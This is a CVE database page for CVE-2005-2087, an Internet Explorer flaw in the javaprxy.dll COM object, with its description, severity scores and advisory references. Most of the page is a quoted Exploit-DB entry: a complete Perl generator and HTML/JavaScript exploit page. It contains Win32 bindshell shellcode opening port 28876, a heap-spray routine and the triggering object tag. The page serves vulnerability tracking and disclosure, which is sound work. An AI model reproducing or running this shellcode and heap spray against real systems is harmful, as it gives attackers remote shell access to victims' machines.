CVE-2005-2087 : Detail

CVE-2005-2087

65.27%V4
Network
2005-06-30
02h00 +00:00
2018-10-12
17h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Internet Explorer 5.01 SP4 up to 6 on various Windows operating systems, including IE 6.0.2900.2180 on Windows XP, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a web page with embedded CLSIDs that reference certain COM objects that are not ActiveX controls, as demonstrated using the JVIEW Profiler (Javaprxy.dll). NOTE: the researcher says that the vendor could not reproduce this problem.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 1079

Publication date : 2005-07-04 22h00 +00:00
Author : k-otik
EDB Verified : Yes

<!-- (update) frsirt updated the comments to reflect skylined's code + gpl. /str0ke Perl code is commented so people can test the vuln on their IE /str0ke #!/usr/bin/perl # ###################################################### # # Microsoft Internet Explorer "javaprxy.dll" COM Object Exploit -Unpatched- # # Proof of Concept by the FrSIRT < http://www.frsirt.com / team@frsirt.com > # Bindshell on port 28876 - Based on Berend-Jan Wever's IE exploit # 01 July 2005 # # Description - http://www.frsirt.com/english/advisories/2005/0935 # Workarounds - http://www.microsoft.com/technet/security/advisory/903144.mspx # sec-consult - http://www.sec-consult.com/184.html # # Solution : # Set Internet and Local intranet security zone settings to "High" or use # another browser until a patch is released. # # Tested on : # Internet Explorer 6 on Microsoft Windows XP SP2 # Internet Explorer 6 on Microsoft Windows XP SP1 # # Affected versions : # Internet Explorer 5.01 Service Pack 3 on Microsoft Windows 2000 Service Pack 3 # Internet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4 # Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 3 # Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4 # Internet Explorer 6 Service Pack 1 on Microsoft Windows XP Service Pack 1 # Internet Explorer 6 for Microsoft Windows XP Service Pack 2 # Internet Explorer 6 Service Pack 1 for Microsoft Windows XP 64-Bit SP1 (Itanium) # Internet Explorer 6 for Microsoft Windows Server 2003 # Internet Explorer 6 for Microsoft Windows Server 2003 Service Pack 1 # Internet Explorer 6 for Microsoft Windows Server 2003 for Itanium-based Systems # Internet Explorer 6 for Microsoft Windows Server 2003 with SP1 for Itanium # Internet Explorer 6 for Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium) # Internet Explorer 6 for Microsoft Windows Server 2003 x64 Edition # Internet Explorer 6 for Microsoft Windows XP Professional x64 Edition # Internet Explorer 5.5 Service Pack 2 on Microsoft Windows Millennium Edition # Internet Explorer 6 Service Pack 1 on Microsoft Windows 98 # Internet Explorer 6 Service Pack 1 on Microsoft Windows 98 SE # Internet Explorer 6 Service Pack 1 on Microsoft Windows Millennium Edition # # Usage : perl iejavaprxyexploit.pl > mypage.html # ###################################################### # # This program is free software; you can redistribute it and/or modify it under # the terms of the GNU General Public License version 2, 1991 as published by # the Free Software Foundation. # # This program is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # FOR A PARTICULAR PURPOSE. See the GNU General Public License for more # details. # # A copy of the GNU General Public License can be found at: # http://www.gnu.org/licenses/gpl.html # or you can write to: # Free Software Foundation, Inc. # 59 Temple Place - Suite 330 # Boston, MA 02111-1307 # USA. # ###################################################### # header my $header = "<html><body>\n<SCRIPT language=\"javascript\">\n"; # Win32 bindshell (port 28876) - SkyLined my $shellcode = "shellcode = unescape(\"%u4343\"+\"%u4343\"+\"%u43eb". "%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea". "%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7". "%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b". "%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64". "%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c". "%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe". "%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0". "%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050". "%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6". "%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650". "%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa". "%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656". "%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1". "%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353". "%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353". "%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe". "%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff". "%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb\");\n"; # Memory my $code = "bigblock = unescape(\"%u0D0D%u0D0D\");\n". "headersize = 20;\n". "slackspace = headersize+shellcode.length\n". "while (bigblock.length<slackspace) bigblock+=bigblock;\n". "fillblock = bigblock.substring(0, slackspace);\n". "block = bigblock.substring(0, bigblock.length-slackspace);\n". "while(block.length+slackspace<0x40000) block = block+block+fillblock;\n". "memory = new Array();\n". "for (i=0;i<750;i++) memory[i] = block + shellcode;\n". "</SCRIPT>\n"; # javaprxy.dll my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0'; # footer my $footer = "<object classid=\"CLSID:".$clsid."\"></object>\n". "Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit\n". "by the FrSIRT < http://www.frsirt.com >\n". "Solution - http://www.frsirt.com/english/advisories/2005/0935". "</body><script>location.reload();</script></html>"; # print "Content-Type: text/html;\r\n\r\n"; # if you are in cgi-bin print "$header $shellcode $code $footer"; --> <html><body> <SCRIPT language="javascript"> shellcode = unescape("%u4343"+"%u4343"+"%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb"); bigblock = unescape("%u0D0D%u0D0D"); headersize = 20; slackspace = headersize+shellcode.length while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (i=0;i<750;i++) memory[i] = block + shellcode; </SCRIPT> <object classid="CLSID:03D9F3F2-B0E3-11D2-B081-006008039BF0"></object> Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit by the FrSIRT < http://www.frsirt.com > Solution - http://www.frsirt.com/english/advisories/2005/0935</body><script>location.reload();</script></html> # milw0rm.com [2005-07-05]

Products Mentioned

Configuraton 0

Microsoft>>Ie >> Version 5.1

    Microsoft>>Ie >> Version 5.2.3

      Microsoft>>Ie >> Version 6

        Microsoft>>Internet_explorer >> Version 5.1

        Microsoft>>Internet_explorer >> Version 5.01

        Microsoft>>Internet_explorer >> Version 5.5

        Microsoft>>Internet_explorer >> Version 5.5

        Microsoft>>Internet_explorer >> Version 5.5

        Microsoft>>Internet_explorer >> Version 5.5

        Microsoft>>Internet_explorer >> Version 6.0

        Microsoft>>Internet_explorer >> Version 6.0.2900.2180

        References

        http://marc.info/?l=bugtraq&m=112006764714946&w=2
        Tags : mailing-list, x_refsource_BUGTRAQ
        http://www.kb.cert.org/vuls/id/959049
        Tags : third-party-advisory, x_refsource_CERT-VN
        http://www.us-cert.gov/cas/techalerts/TA05-193A.html
        Tags : third-party-advisory, x_refsource_CERT
        http://www.kb.cert.org/vuls/id/939605
        Tags : third-party-advisory, x_refsource_CERT-VN
        http://securitytracker.com/id?1014329
        Tags : vdb-entry, x_refsource_SECTRACK
        http://www.securityfocus.com/bid/14087
        Tags : vdb-entry, x_refsource_BID
        http://www.securityfocus.com/archive/1/404055
        Tags : mailing-list, x_refsource_BUGTRAQ
        http://secunia.com/advisories/15891
        Tags : third-party-advisory, x_refsource_SECUNIA
        http://www.osvdb.org/17680
        Tags : vdb-entry, x_refsource_OSVDB
        http://www.auscert.org.au/render.html?it=5225
        Tags : third-party-advisory, x_refsource_AUSCERT
        http://www.vupen.com/english/advisories/2005/0935
        Tags : vdb-entry, x_refsource_VUPEN
        The information presented on CVE Find originates from several carefully selected reference sources. CVE data is provided by MITRE Corporation and the National Vulnerability Database (NVD). The Known Exploited Vulnerabilities (KEV) catalog is sourced from the Cybersecurity and Infrastructure Security Agency (CISA), while EPSS scores come from FIRST.org. Additionally, data regarding software weaknesses (CWE) and common attack patterns (CAPEC) is maintained by MITRE Corporation, and information on hardware and software configurations (CPE) is provided by the NVD.